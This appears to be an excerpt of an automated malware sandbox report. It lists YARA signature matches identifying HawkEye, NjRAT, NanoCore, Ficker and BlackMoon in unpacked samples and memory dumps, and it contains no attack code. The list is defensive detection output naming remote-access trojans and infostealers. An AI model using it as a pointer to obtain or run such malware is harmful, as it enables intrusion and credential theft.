                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.0.22.exe.530edf.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 15.2.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.c8867b.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.530edf.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 5.2.Pluto Panel.exe.3706aac.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
